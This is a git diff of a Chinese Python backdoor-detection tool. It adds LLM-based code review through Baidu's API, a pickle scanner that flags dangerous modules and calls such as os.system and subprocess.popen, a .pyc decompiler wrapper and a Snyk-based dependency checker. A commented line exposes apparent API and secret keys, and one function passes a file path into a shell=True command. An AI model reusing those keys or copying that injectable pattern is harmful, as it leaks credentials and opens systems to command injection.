|
||||
|
||||
参数:
|
||||
- content: 要检测的代码字符串。
|
||||
|
||||
返回:
|
||||
- 分类后的漏洞信息的JSON字符串。
|
||||
"""
|
||||
|
||||
url = "https://aip.baidubce.com/rpc/2.0/ai_custom/v1/wenxinworkshop/chat/ernie-4.0-8k-0329?access_token=" + token
|
||||
|
||||
payload = json.dumps({
|
||||
"messages": [
|
||||
{
|
||||
"role": "user",
|
||||
"content": (
|
||||
"You are a Python code reviewer. Read the code below and identify any potential "
|
||||
"security vulnerabilities. Classify them by risk level (high, medium, low, none). "
|
||||
'Only report the line number and the risk level.\nYou should output the result as '
|
||||
'json format in one line. For example: [{"Line": {the line number}, "Risk": "{choose from (high,medium,low)}","Reason":"{how it is vulnerable}"}] '
|
||||
"Each of these three fields is required.\nYou are required to only output the json format. "
|
||||
"Do not output any other information." + content
|
||||
)
|
||||
}
|
||||
]
|
||||
})
|
||||
headers = {
|
||||
'Content-Type': 'application/json'
|
||||
}
|
||||
|
||||
try:
|
||||
response = requests.post(url, headers=headers, data=payload)
|
||||
response.raise_for_status()
|
||||
res_json = response.json()
|
||||
message_content = res_json.get('result')
|
||||
if message_content is None:
|
||||
raise ValueError("API response content is None")
|
||||
except requests.RequestException as e:
|
||||
raise ValueError(f"Request failed: {str(e)}")
|
||||
|
||||
extracted_data = extract_json_from_text(message_content)
|
||||
|
||||
classified_results = {"high": [], "medium": [], "low": [], "none": []}
|
||||
for res in extracted_data:
|
||||
# print(res)
|
||||
try:
|
||||
line_number = int(res["Line"])
|
||||
classified_results[res["Risk"]].append(
|
||||
(line_number, content.split("\n")[line_number - 1].strip())
|
||||
)
|
||||
except (ValueError, IndexError, KeyError):
|
||||
continue
|
||||
|
||||
return classified_results
|
||||
|
||||
|
||||
def get_access_token(api_key: str, secret_key: str) -> str:
|
||||
"""
|
||||
使用API密钥和秘密生成访问令牌。
|
||||
|
||||
返回:
|
||||
- access_token字符串。
|
||||
"""
|
||||
url = "https://aip.baidubce.com/oauth/2.0/token"
|
||||
params = {"grant_type": "client_credentials", "client_id": api_key, "client_secret": secret_key}
|
||||
response = requests.post(url, params=params)
|
||||
response.raise_for_status()
|
||||
return response.json().get("access_token")
|
||||
|
||||
|
||||
def extract_json_from_text(text: str) -> List[Dict[str, Any]]:
|
||||
"""
|
||||
从文本中提取JSON数据。
|
||||
|
||||
参数:
|
||||
- text: 包含JSON数据的字符串文本。
|
||||
|
||||
返回:
|
||||
- 包含提取JSON数据的字典列表。
|
||||
"""
|
||||
json_match = re.search(r'\[\s*{.*?}\s*\]', text, re.DOTALL)
|
||||
if not json_match:
|
||||
print("未找到 JSON 数据")
|
||||
return []
|
||||
|
||||
json_string = json_match.group(0)
|
||||
try:
|
||||
data = json.loads(json_string)
|
||||
except json.JSONDecodeError as e:
|
||||
print(f"解码 JSON 时出错: {e}")
|
||||
return []
|
||||
|
||||
return data
|
||||
|
||||
|
||||
def GPTdetectFileList(fileList):
|
||||
api_key = os.getenv("BAIDU_API_KEY")
|
||||
secret_key = os.getenv("BAIDU_SECRET_KEY")
|
||||
# api_key = "DUBWNIrB6QJLOsLkpnEz2ZZa"
|
||||
# secret_key = "9WK4HIV2n9r1ePPirqD4EQ6Ea33rH1m7"
|
||||
if not api_key or not secret_key:
|
||||
raise ValueError("BAIDU_API_KEY or BAIDU_SECRET_KEY is not set")
|
||||
# print(len(fileList))
|
||||
results = {"high": [], "medium": [], "low": [], "none": []}
|
||||
threads = []
|
||||
token = get_access_token(api_key, secret_key)
|
||||
# print(token)
|
||||
for file in fileList:
|
||||
content = read_file_content(str(file))
|
||||
threads.append(threading.Thread(target=GPTThread, args=(str(file), content, results,token)))
|
||||
for thread in threads:
|
||||
thread.start()
|
||||
time.sleep(0.5)
|
||||
for thread in threads:
|
||||
thread.join()
|
||||
return results
|
||||
|
||||
|
||||
def GPTThread(filename, content, results,token):
|
||||
|
||||
res = detectGPT(content,token)
|
||||
# print(res)
|
||||
for key in res:
|
||||
if key != "none": # Exclude 'none' risk level
|
||||
results[key].extend(
|
||||
[
|
||||
(f"{filename}: Line {line_num}", line)
|
||||
for line_num, line in res[key]
|
||||
]
|
||||
)
|
||||
149
detection/pickle_detection.py
Normal file
149
detection/pickle_detection.py
Normal file
@@ -0,0 +1,149 @@
|
||||
import io
|
||||
import json
|
||||
import pickle
|
||||
|
||||
|
||||
class _Unframer:
|
||||
|
||||
def __init__(self, file_read, file_readline, file_tell=None):
|
||||
self.file_read = file_read
|
||||
self.file_readline = file_readline
|
||||
self.current_frame = None
|
||||
|
||||
def readinto(self, buf):
|
||||
if self.current_frame:
|
||||
n = self.current_frame.readinto(buf)
|
||||
if n == 0 and len(buf) != 0:
|
||||
self.current_frame = None
|
||||
n = len(buf)
|
||||
buf[:] = self.file_read(n)
|
||||
return n
|
||||
if n < len(buf):
|
||||
raise pickle.UnpicklingError("pickle exhausted before end of frame")
|
||||
return n
|
||||
else:
|
||||
n = len(buf)
|
||||
buf[:] = self.file_read(n)
|
||||
return n
|
||||
|
||||
def read(self, n):
|
||||
if self.current_frame:
|
||||
data = self.current_frame.read(n)
|
||||
if not data and n != 0:
|
||||
self.current_frame = None
|
||||
return self.file_read(n)
|
||||
if len(data) < n:
|
||||
raise pickle.UnpicklingError("pickle exhausted before end of frame")
|
||||
return data
|
||||
else:
|
||||
return self.file_read(n)
|
||||
|
||||
def readline(self):
|
||||
if self.current_frame:
|
||||
data = self.current_frame.readline()
|
||||
if not data:
|
||||
self.current_frame = None
|
||||
return self.file_readline()
|
||||
if data[-1] != b"\n"[0]:
|
||||
raise pickle.UnpicklingError("pickle exhausted before end of frame")
|
||||
return data
|
||||
else:
|
||||
return self.file_readline()
|
||||
|
||||
def load_frame(self, frame_size):
|
||||
if self.current_frame and self.current_frame.read() != b"":
|
||||
raise pickle.UnpicklingError(
|
||||
"beginning of a new frame before end of current frame"
|
||||
)
|
||||
self.current_frame = io.BytesIO(self.file_read(frame_size))
|
||||
|
||||
|
||||
dangerous_modules = ["os", "subprocess", "builtins", "nt"]
|
||||
dangerous_names = [
|
||||
"system",
|
||||
"popen",
|
||||
"run",
|
||||
"call",
|
||||
"check_output",
|
||||
"check_call",
|
||||
]
|
||||
|
||||
|
||||
class pickleScanner:
|
||||
|
||||
def __init__(
|
||||
self, file, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None
|
||||
):
|
||||
self._buffers = iter(buffers) if buffers is not None else None
|
||||
self._file_readline = file.readline
|
||||
self._file_read = file.read
|
||||
self.memo = {}
|
||||
self.encoding = encoding
|
||||
self.errors = errors
|
||||
self.proto = 0
|
||||
self.fix_imports = fix_imports
|
||||
self.file = file
|
||||
self.ReduceCount = 0
|
||||
self.maliciousModule = []
|
||||
|
||||
def find_class(self, module, name):
|
||||
if module.decode() in dangerous_modules or name.decode() in dangerous_names:
|
||||
# self.maliciousCount += 1
|
||||
self.maliciousModule.append((module.decode(), name.decode()))
|
||||
|
||||
def load(self):
|
||||
self._unframer = _Unframer(self._file_read, self._file_readline)
|
||||
self.read = self._unframer.read
|
||||
self.readinto = self._unframer.readinto
|
||||
self.readline = self._unframer.readline
|
||||
self.seek = self.file.seek
|
||||
self.metastack = []
|
||||
self.stack = []
|
||||
self.append = self.stack.append
|
||||
self.proto = 0
|
||||
# 扫描所有的opcodes
|
||||
opcode = self.read(1)
|
||||
while opcode:
|
||||
if opcode == b"c":
|
||||
self.seek(-2, 1)
|
||||
codeN1 = self.read(1)
|
||||
if (
|
||||
65 <= ord(codeN1) <= 90
|
||||
or 97 <= ord(codeN1) <= 122
|
||||
or ord(codeN1) == 0
|
||||
):
|
||||
self.read(1)
|
||||
else:
|
||||
self.read(1)
|
||||
module = self.readline()[:-1]
|
||||
name = self.readline()[:-1]
|
||||
self.find_class(module, name)
|
||||
elif opcode in self.unsafe_opcodes:
|
||||
self.ReduceCount += 1
|
||||
opcode = self.read(1)
|
||||
|
||||
unsafe_opcodes = {
|
||||
b"r", # REDUCE - call a callable with arguments
|
||||
b"R", # REDUCE - same as 'r', but for args tuple
|
||||
}
|
||||
|
||||
def output(self) -> dict:
|
||||
return {
|
||||
"ReduceCount": self.ReduceCount,
|
||||
"maliciousModule": self.maliciousModule,
|
||||
}
|
||||
|
||||
|
||||
def pickleDataDetection(filename: str, output_file=None):
|
||||
"""
|
||||
:param file: pickle file path
|
||||
"""
|
||||
with open(filename, "rb") as file:
|
||||
pickscan = pickleScanner(file)
|
||||
pickscan.load()
|
||||
res = pickscan.output()
|
||||
return res
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
pickleDataDetection("test.pkl")
|
||||
44
detection/pyc_detection.py
Normal file
44
detection/pyc_detection.py
Normal file
@@ -0,0 +1,44 @@
|
||||
from typing import List, Tuple
|
||||
import io
|
||||
import os
|
||||
import subprocess
|
||||
from contextlib import redirect_stdout, redirect_stderr
|
||||
|
||||
|
||||
def run_pycdc(exe_path: str, pyc_file: str) -> str:
|
||||
"""
|
||||
Executes pycdc.exe with the given .pyc file using a command line string and captures the output.
|
||||
|
||||
Args:
|
||||
exe_path (str): Path to the pycdc.exe executable.
|
||||
pyc_file (str): Path to the .pyc file to decompile.
|
||||
|
||||
Returns:
|
||||
str: Output from pycdc.exe.
|
||||
"""
|
||||
if not os.path.isfile(exe_path):
|
||||
return "invalid"
|
||||
|
||||
command = f'"{exe_path}" "{pyc_file}"'
|
||||
result = subprocess.run(
|
||||
command, capture_output=True, text=True, shell=True, encoding="utf-8"
|
||||
)
|
||||
|
||||
return result.stdout
|
||||
|
||||
|
||||
def disassemble_pyc(file_path: str, pycdc_addr=None) -> str:
|
||||
"""
|
||||
Disassembles a .pyc file using uncompyle6.
|
||||
|
||||
Args:
|
||||
file_path (str): The path to the .pyc file.
|
||||
|
||||
Returns:
|
||||
str: The disassembled code as a string.
|
||||
"""
|
||||
output = io.StringIO()
|
||||
if pycdc_addr is None:
|
||||
return "none"
|
||||
else:
|
||||
return run_pycdc(pycdc_addr, file_path)
|
||||
@@ -1,279 +1,268 @@
|
||||
import re
|
||||
import os
|
||||
import requests
|
||||
import argparse
|
||||
import requests
|
||||
from bs4 import BeautifulSoup
|
||||
from typing import List, Tuple, Optional
|
||||
from packaging import version
|
||||
from packaging.specifiers import SpecifierSet
|
||||
from packaging.version import Version, InvalidVersion
|
||||
import sys
|
||||
from reportlab.lib.pagesizes import letter
|
||||
from reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer
|
||||
from reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle
|
||||
from reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer
|
||||
from colorama import Fore, Style, init
|
||||
from tqdm import tqdm
|
||||
import html
|
||||
import os
|
||||
|
||||
|
||||
def fetch_html(url: str) -> Optional[str]:
|
||||
"""Fetch HTML content from the specified URL.
|
||||
init(autoreset=True) # 初始化colorama,并在每次打印后自动重置颜色
|
||||
|
||||
Args:
|
||||
url (str): URL to fetch HTML from.
|
||||
|
||||
Returns:
|
||||
Optional[str]: HTML content as a string, or None if fetch fails.
|
||||
"""
|
||||
response = requests.get(url)
|
||||
if response.status_code == 200:
|
||||
def fetch_html(url: str) -> str:
|
||||
try:
|
||||
response = requests.get(url)
|
||||
response.raise_for_status()
|
||||
return response.text
|
||||
return None
|
||||
except requests.RequestException as e:
|
||||
print(f"Error fetching {url}: {e}")
|
||||
return ""
|
||||
|
||||
|
||||
def parse_html(html: str) -> List[Tuple[str, List[str]]]:
|
||||
"""Parse HTML to get content of all 'a' and 'span' tags under the second 'td' of each 'tr'.
|
||||
|
||||
Args:
|
||||
html (str): HTML content as a string.
|
||||
|
||||
Returns:
|
||||
List[Tuple[str, List[str]]]: A list of tuples containing the text of 'a' tags and lists of 'span' texts.
|
||||
"""
|
||||
def parse_html(html: str) -> list:
|
||||
soup = BeautifulSoup(html, "html.parser")
|
||||
table = soup.find("table", id="sortable-table")
|
||||
if not table:
|
||||
return []
|
||||
|
||||
rows = table.find_all("tr", class_="vue--table__row")
|
||||
results = []
|
||||
if table:
|
||||
rows = table.find("tbody").find_all("tr")
|
||||
for row in rows:
|
||||
tds = row.find_all("td")
|
||||
if len(tds) >= 2:
|
||||
a_tags = tds[1].find_all("a")
|
||||
span_tags = tds[1].find_all("span")
|
||||
spans = [span.text.strip() for span in span_tags]
|
||||
for a_tag in a_tags:
|
||||
results.append((a_tag.text.strip(), spans))
|
||||
for row in rows:
|
||||
info = {}
|
||||
link = row.find("a")
|
||||
chip = row.find("span", class_="vue--chip__value")
|
||||
if link and chip:
|
||||
info["link"] = link.get_text(strip=True)
|
||||
info["chip"] = chip.get_text(strip=True)
|
||||
results.append(info)
|
||||
return results
|
||||
|
||||
|
||||
def format_results(results: List[Tuple[str, List[str]]]) -> str:
|
||||
"""Format extracted data as a string.
|
||||
|
||||
Args:
|
||||
results (List[Tuple[str, List[str]]]): Extracted data to format.
|
||||
|
||||
Returns:
|
||||
str: Formatted string of the extracted data.
|
||||
"""
|
||||
formatted_result = ""
|
||||
for package_name, version_ranges in results:
|
||||
formatted_result += f"Package Name: {package_name}\n"
|
||||
formatted_result += "Version Ranges: " + ", ".join(version_ranges) + "\n"
|
||||
formatted_result += "-" * 50 + "\n"
|
||||
return formatted_result
|
||||
|
||||
|
||||
def trans_vulnerable_packages(content):
|
||||
"""将漏洞版本中的集合形式转换为大于小于的格式
|
||||
Args:
|
||||
content (str): 漏洞版本汇总信息.
|
||||
"""
|
||||
vulnerabilities = {}
|
||||
blocks = content.split("--------------------------------------------------")
|
||||
range_pattern = re.compile(r"\[(.*?),\s*(.*?)\)")
|
||||
|
||||
for block in blocks:
|
||||
name_match = re.search(r"Package Name: (.+)", block)
|
||||
if name_match:
|
||||
package_name = name_match.group(1).strip()
|
||||
ranges = range_pattern.findall(block)
|
||||
specifier_list = []
|
||||
for start, end in ranges:
|
||||
if start and end:
|
||||
specifier_list.append(f">={start},<{end}")
|
||||
elif start:
|
||||
specifier_list.append(f">={start}")
|
||||
elif end:
|
||||
specifier_list.append(f"<{end}")
|
||||
if specifier_list:
|
||||
vulnerabilities[package_name] = SpecifierSet(",".join(specifier_list))
|
||||
return vulnerabilities
|
||||
|
||||
|
||||
def format_vulnerabilities(vuln_packages):
|
||||
"""将字典形式的漏洞信息格式化
|
||||
Args:
|
||||
vuln_packages (List[Tuple[str, List[str]]]): Extracted data to format.
|
||||
"""
|
||||
res = ""
|
||||
for package, specifiers in vuln_packages.items():
|
||||
res += f"Package Name: {package}\n"
|
||||
res += f"Version Ranges: {specifiers}\n"
|
||||
res += "-" * 50 + "\n"
|
||||
return res
|
||||
|
||||
|
||||
def load_requirements(filename):
|
||||
"""从文件加载项目的依赖信息"""
|
||||
with open(filename, "r", encoding="utf-8") as file:
|
||||
lines = file.readlines()
|
||||
requirements = {}
|
||||
for line in lines:
|
||||
if "==" in line:
|
||||
package_name, package_version = line.strip().split("==")
|
||||
requirements[package_name] = package_version
|
||||
def load_requirements(file_path: str) -> list:
|
||||
requirements = []
|
||||
try:
|
||||
with open(file_path, "r") as file:
|
||||
for line in file:
|
||||
line = line.strip()
|
||||
if line and not line.startswith("#"):
|
||||
requirements.append(line)
|
||||
except FileNotFoundError:
|
||||
print(f"Error: File {file_path} not found.")
|
||||
sys.exit(1)
|
||||
return requirements
|
||||
|
||||
|
||||
def check_vulnerabilities(requirements, vulnerabilities, output_file):
|
||||
"""检查依赖项是否存在已知漏洞,并输出结果"""
|
||||
results_warning = [] # 存储有漏洞的依赖
|
||||
results_ok = [] # 存储没有漏洞的依赖
|
||||
|
||||
for req_name, req_version in requirements.items():
|
||||
if req_name in vulnerabilities:
|
||||
spec = vulnerabilities[req_name]
|
||||
if version.parse(req_version) in spec:
|
||||
results_warning.append(
|
||||
f"WARNING: {req_name}=={req_version} is vulnerable!"
|
||||
)
|
||||
else:
|
||||
results_ok.append(f"OK: {req_name}=={req_version} is not affected.")
|
||||
else:
|
||||
results_ok.append(
|
||||
f"OK: {req_name} not found in the vulnerability database."
|
||||
)
|
||||
|
||||
# 合并结果,先输出所有警告,然后输出所有正常情况
|
||||
results = results_warning + results_ok
|
||||
# print(results)
|
||||
if output_file:
|
||||
filename, ext = os.path.splitext(output_file)
|
||||
output_format = ext[1:] if ext[1:] else "txt"
|
||||
if output_format not in ["txt", "md", "html", "pdf"]:
|
||||
print("Warning: Invalid file format specified. Defaulting to TXT format.")
|
||||
output_format = "txt" # 确保使用默认格式
|
||||
output_file = filename + ".txt"
|
||||
output_results(output_file, results, output_format)
|
||||
def version_in_range(version, range_str: str) -> bool:
|
||||
if version is not None:
|
||||
try:
|
||||
v = Version(version)
|
||||
except InvalidVersion:
|
||||
return False
|
||||
else:
|
||||
print("\n".join(results))
|
||||
if range_str[-2] == ",":
|
||||
return True
|
||||
|
||||
ranges = range_str.split(",")
|
||||
for range_part in ranges:
|
||||
range_part = range_part.strip("[]()")
|
||||
if range_part:
|
||||
try:
|
||||
if range_part.endswith(")"):
|
||||
upper = Version(range_part[:-1])
|
||||
if v >= upper:
|
||||
return False
|
||||
elif range_part.startswith("["):
|
||||
lower = Version(range_part[1:])
|
||||
if v < lower:
|
||||
return False
|
||||
except InvalidVersion:
|
||||
return False
|
||||
return True
|
||||
|
||||
|
||||
def trans_vulnerable_packages_to_dict(content):
|
||||
"""将漏洞信息转换为字典格式
|
||||
Args:
|
||||
content str: 漏洞信息汇总.
|
||||
def check_vulnerabilities(requirements: list, base_url: str) -> str:
|
||||
results = []
|
||||
for req in tqdm(requirements, desc="Checking vulnerabilities", unit="dependency"):
|
||||
version = ""
|
||||
if "==" in req:
|
||||
package_name, version = req.split("==")
|
||||
else:
|
||||
package_name, version = req, None
|
||||
url = f"{base_url}{package_name}"
|
||||
# print(f"\nFetching data for {package_name} from {url}")
|
||||
html_content = fetch_html(url)
|
||||
if html_content:
|
||||
extracted_data = parse_html(html_content)
|
||||
if extracted_data:
|
||||
relevant_vulns = []
|
||||
for vuln in extracted_data:
|
||||
if version_in_range(version, vuln["chip"]):
|
||||
relevant_vulns.append(vuln)
|
||||
if relevant_vulns:
|
||||
result = f"Vulnerabilities found for {package_name}:\n"
|
||||
for vuln in relevant_vulns:
|
||||
result += f" - {vuln['link']}\n"
|
||||
results.append(result)
|
||||
return "\n".join(results)
|
||||
|
||||
|
||||
def save_to_file(output_path: str, data: str):
|
||||
if output_path.endswith(".html"):
|
||||
save_as_html(output_path, data)
|
||||
elif output_path.endswith(".pdf"):
|
||||
save_as_pdf(output_path, data)
|
||||
elif output_path.endswith(".md"):
|
||||
save_as_markdown(output_path, data)
|
||||
else:
|
||||
save_as_txt(output_path, data)
|
||||
|
||||
|
||||
def save_as_html(output_path: str, data: str):
|
||||
escaped_data = html.escape(data)
|
||||
html_content = f"""
|
||||
<html>
|
||||
<head>
|
||||
<meta charset="UTF-8">
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
||||
<link rel="icon" href="https://s2.loli.net/2024/05/30/WDc6MekjbuCU9Qo.png">
|
||||
<title>Vulnerability Report</title>
|
||||
<style>
|
||||
body {{
|
||||
font-family: Arial, sans-serif;
|
||||
background-image: url('https://s2.loli.net/2024/05/30/85Mv7leB2IRWNp6.jpg');
|
||||
background-size: cover;
|
||||
color: #333;
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
display: flex;
|
||||
justify-content: center;
|
||||
align-items: center;
|
||||
height: 100vh;
|
||||
}}
|
||||
.container {{
|
||||
background: rgba(255, 255, 255, 0.8);
|
||||
border-radius: 10px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
|
||||
max-width: 800px;
|
||||
width: 100%;
|
||||
margin: 20px;
|
||||
overflow-y: auto;
|
||||
max-height: 90vh;
|
||||
}}
|
||||
.title {{
|
||||
font-size: 24px;
|
||||
font-weight: bold;
|
||||
text-align: center;
|
||||
margin-bottom: 20px;
|
||||
}}
|
||||
pre {{
|
||||
white-space: pre-wrap;
|
||||
word-wrap: break-word;
|
||||
font-size: 14px;
|
||||
line-height: 1.5;
|
||||
color: #333;
|
||||
background: #f4f4f4;
|
||||
padding: 10px;
|
||||
border-radius: 5px;
|
||||
border: 1px solid #ddd;
|
||||
overflow: auto;
|
||||
font-weight: bold;
|
||||
}}
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<div class="container">
|
||||
<div class="title">Vulnerability Report</div>
|
||||
<pre>{escaped_data}</pre>
|
||||
</div>
|
||||
</body>
|
||||
</html>
|
||||
"""
|
||||
vulnerabilities = {}
|
||||
blocks = content.split("--------------------------------------------------")
|
||||
for block in blocks:
|
||||
name_match = re.search(r"Package Name: (.+)", block)
|
||||
range_match = re.search(r"Version Ranges: (.+)", block)
|
||||
if name_match and range_match:
|
||||
package_name = name_match.group(1).strip()
|
||||
version_range = range_match.group(1).strip()
|
||||
version_range = ",".join(
|
||||
[part.strip() for part in version_range.split(",")]
|
||||
)
|
||||
vulnerabilities[package_name] = SpecifierSet(version_range)
|
||||
return vulnerabilities
|
||||
with open(output_path, "w", encoding="utf-8") as file:
|
||||
file.write(html_content)
|
||||
|
||||
|
||||
def output_pdf(results, file_name):
|
||||
doc = SimpleDocTemplate(file_name, pagesize=letter)
|
||||
def save_as_pdf(output_path: str, data: str):
|
||||
doc = SimpleDocTemplate(output_path, pagesize=letter)
|
||||
story = []
|
||||
styles = getSampleStyleSheet()
|
||||
|
||||
# Custom styles
|
||||
title_style = styles["Title"]
|
||||
title_style.alignment = 1 # Center alignment
|
||||
|
||||
warning_style = ParagraphStyle(
|
||||
"WarningStyle", parent=styles["BodyText"], fontName="Helvetica-Bold"
|
||||
# Add the title centered
|
||||
title_style = ParagraphStyle(
|
||||
"Title",
|
||||
parent=styles["Title"],
|
||||
alignment=1, # Center alignment
|
||||
fontSize=24,
|
||||
leading=28,
|
||||
spaceAfter=20,
|
||||
fontName="Helvetica-Bold",
|
||||
)
|
||||
normal_style = styles["BodyText"]
|
||||
|
||||
# Add the title
|
||||
title = Paragraph("Vulnerability Report", title_style)
|
||||
story.append(title)
|
||||
story.append(Spacer(1, 20)) # Space after title
|
||||
|
||||
# Iterate through results to add entries
|
||||
for result in results:
|
||||
if "WARNING:" in result:
|
||||
# Add warning text in bold
|
||||
entry = Paragraph(
|
||||
result.replace("WARNING:", "<b>WARNING:</b>"), warning_style
|
||||
)
|
||||
else:
|
||||
# Add normal text
|
||||
entry = Paragraph(result, normal_style)
|
||||
# Normal body text style
|
||||
normal_style = ParagraphStyle(
|
||||
"BodyText", parent=styles["BodyText"], fontSize=12, leading=15, spaceAfter=12
|
||||
)
|
||||
|
||||
story.append(entry)
|
||||
story.append(Spacer(1, 12)) # Space between entries
|
||||
# Add the vulnerability details
|
||||
for line in data.split("\n"):
|
||||
if line.strip(): # Skip empty lines
|
||||
story.append(Paragraph(line, normal_style))
|
||||
|
||||
doc.build(story)
|
||||
|
||||
|
||||
def output_results(filename, results, format_type):
|
||||
"""根据指定的格式输出结果"""
|
||||
output_dir = os.path.dirname(filename)
|
||||
if not os.path.exists(output_dir):
|
||||
os.makedirs(output_dir)
|
||||
|
||||
with open(filename, "w", encoding="utf-8") as file:
|
||||
if format_type == "html":
|
||||
file.write("<html><head><title>Vulnerability Report</title></head><body>\n")
|
||||
file.write("<h1>Vulnerability Report</h1>\n")
|
||||
for result in results:
|
||||
file.write(f"<p>{result}</p>\n")
|
||||
file.write("</body></html>")
|
||||
elif format_type == "md":
|
||||
file.write("# Vulnerability Report\n")
|
||||
for result in results:
|
||||
file.write(f"* {result}\n")
|
||||
elif format_type == "pdf":
|
||||
output_pdf(results, filename)
|
||||
else: # 默认为txt
|
||||
for result in results:
|
||||
file.write(f"{result}\n")
|
||||
|
||||
print("Results have been saved as " + filename)
|
||||
def save_as_markdown(output_path: str, data: str):
|
||||
with open(output_path, "w") as file:
|
||||
file.write("## Vulnerability Report: \n\n")
|
||||
file.write(data)
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(
|
||||
description="Check project dependencies for vulnerabilities."
|
||||
)
|
||||
parser.add_argument(
|
||||
"requirements_file", help="Path to the requirements file of the project"
|
||||
)
|
||||
parser.add_argument(
|
||||
"-o",
|
||||
"--output",
|
||||
help="Output file path with extension, e.g., './output/report.txt'",
|
||||
)
|
||||
args = parser.parse_args()
|
||||
|
||||
base_url = "https://security.snyk.io/vuln/pip/"
|
||||
page_number = 1
|
||||
crawler_results = ""
|
||||
while True:
|
||||
url = f"{base_url}{page_number}"
|
||||
print(f"Fetching data from {url}")
|
||||
html_content = fetch_html(url)
|
||||
if not html_content:
|
||||
print("No more data found or failed to fetch.")
|
||||
break
|
||||
extracted_data = parse_html(html_content)
|
||||
if not extracted_data:
|
||||
print("No relevant data found on page.")
|
||||
break
|
||||
crawler_results += format_results(extracted_data)
|
||||
page_number += 1
|
||||
print("Results have been stored in memory.\n")
|
||||
|
||||
trans_res = trans_vulnerable_packages(crawler_results)
|
||||
trans_res = format_vulnerabilities(trans_res)
|
||||
trans_res = trans_vulnerable_packages_to_dict(trans_res)
|
||||
requirements = load_requirements(args.requirements_file)
|
||||
check_vulnerabilities(requirements, trans_res, args.output)
|
||||
def save_as_txt(output_path: str, data: str):
|
||||
with open(output_path, "w") as file:
|
||||
file.write("Vulnerability Report: \n\n")
|
||||
file.write(data)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
def print_separator(title, char="-", length=50, padding=2):
|
||||
print(f"{title:^{length + 4*padding}}") # 居中打印标题,两侧各有padding个空格
|
||||
print(char * (length + 2 * padding)) # 打印分割线,两侧各有padding个字符的空格
|
||||
|
||||
|
||||
def modify_file_name(file_path: str) -> str:
|
||||
"""
|
||||
Modify the file name by adding '-re' before the file extension.
|
||||
|
||||
Args:
|
||||
file_path (str): The original file path.
|
||||
|
||||
Returns:
|
||||
str: The modified file path.
|
||||
"""
|
||||
directory, file_name = os.path.split(file_path)
|
||||
name, ext = os.path.splitext(file_name)
|
||||
new_file_name = f"{name}-re{ext}"
|
||||
new_file_path = os.path.join(directory, new_file_name)
|
||||
return new_file_path
|
||||
|
||||
|
||||
def requirement_detection(requirement_path, output_path=None):
|
||||
base_url = "https://security.snyk.io/package/pip/"
|
||||
requirements = load_requirements(requirement_path)
|
||||
results = check_vulnerabilities(requirements, base_url)
|
||||
if output_path is not None:
|
||||
new_path = modify_file_name(output_path)
|
||||
save_to_file(new_path, results)
|
||||
print(f"Vulnerability scan complete. Results saved to {output_path}")
|
||||
print(f"Requirements scan complete. Results saved to {new_path}")
|
||||
else:
|
||||
print_separator("\nVulnerability Report", "=", 40, 5)
|
||||
print(results)
|
||||
|
||||
@@ -4,7 +4,7 @@ import sys
|
||||
|
||||
def read_file_content(file_path: str) -> str:
|
||||
try:
|
||||
with open(file_path, "r", encoding="utf-8") as file:
|
||||
with open(file_path, "r", encoding="utf-8", errors="ignore") as file:
|
||||
return file.read()
|
||||
except FileNotFoundError:
|
||||
print("Error: File not found.")
|
||||
@@ -21,4 +21,4 @@ def remove_comments(code: str, extension: str) -> str:
|
||||
code = re.sub(r"//.*", "", code)
|
||||
code = re.sub(r"/\*.*?\*/", "", code, flags=re.DOTALL)
|
||||
return code.strip()
|
||||
return code.strip()
|
||||
return code.strip()
|
||||
|
||||
@@ -1,9 +1,64 @@
|
||||
# 项目设计文档 - 后门检测系统
|
||||
|
||||
## 打包
|
||||
|
||||
### 简介
|
||||
|
||||
本项目需要将 Python 代码打包成`pip`包和`deb`包,以便于分发和安装。以下是如何实现和使用该打包功能的详细步骤。
|
||||
|
||||
### pip
|
||||
|
||||
#### 打包命令
|
||||
|
||||
```bash
|
||||
pip install wheel
|
||||
python setup.py sdist bdist_wheel
|
||||
```
|
||||
|
||||
执行上述命令后,会在 dist 目录下生成 .tar.gz 和 .whl 文件。
|
||||
|
||||
#### 本地安装
|
||||
|
||||
- 安装 .whl 文件:
|
||||
|
||||
``` bash
|
||||
pip install dist/backdoor_buster-0.1.0-py3-none-any.whl
|
||||
```
|
||||
|
||||
- 安装 .tar.gz 文件:
|
||||
|
||||
``` bash
|
||||
pip install dist/backdoor_buster-0.1.0.tar.gz
|
||||
```
|
||||
|
||||
#### 上传到 PyPI
|
||||
|
||||
- 安装 twine:
|
||||
|
||||
``` bash
|
||||
pip install twine
|
||||
```
|
||||
|
||||
- 使用 twine 上传包到 PyPI:
|
||||
|
||||
``` bash
|
||||
twine upload dist/*
|
||||
```
|
||||
|
||||
需要提供 PyPI 的用户名和密码。如果没有 PyPI 账号,可以在 PyPI 注册。
|
||||
|
||||
#### 使用 PyPI 安装
|
||||
|
||||
包上传到 PyPI 后,可以通过以下命令安装:
|
||||
|
||||
``` bash
|
||||
pip install backdoor_buster
|
||||
```
|
||||
|
||||
## 静态代码后门检测
|
||||
|
||||
**功能描述**:
|
||||
这个脚本用于扫描指定路径下的代码文件,检测潜在的危险函数调用,支持 `.py`, `.js`, `.cpp` 文件。
|
||||
这个脚本用于扫描指定路径下的代码文件,检测潜在的危险函数调用,支持 `.py`, `.js`, `.cpp`, `.pyc` 文件。
|
||||
|
||||
**主要组件**:
|
||||
|
||||
@@ -67,7 +122,7 @@ python backdoor_detection.py ./src -o ./output/report.pdf
|
||||
**使用示例**:
|
||||
|
||||
```bash
|
||||
python requirements_detection.py ./requirements.txt -o ./output/report.md
|
||||
python -m detection.requirements_detection ./requirements.txt -o ./output/report.md
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
@@ -46,7 +46,18 @@
|
||||
|
||||
- **主要应用**:通过爬虫收集漏洞依赖信息并进行汇总,用于判断依赖是否存在漏洞版本。
|
||||
|
||||
## 8. 代码和风险分析
|
||||
## 8. 打包
|
||||
|
||||
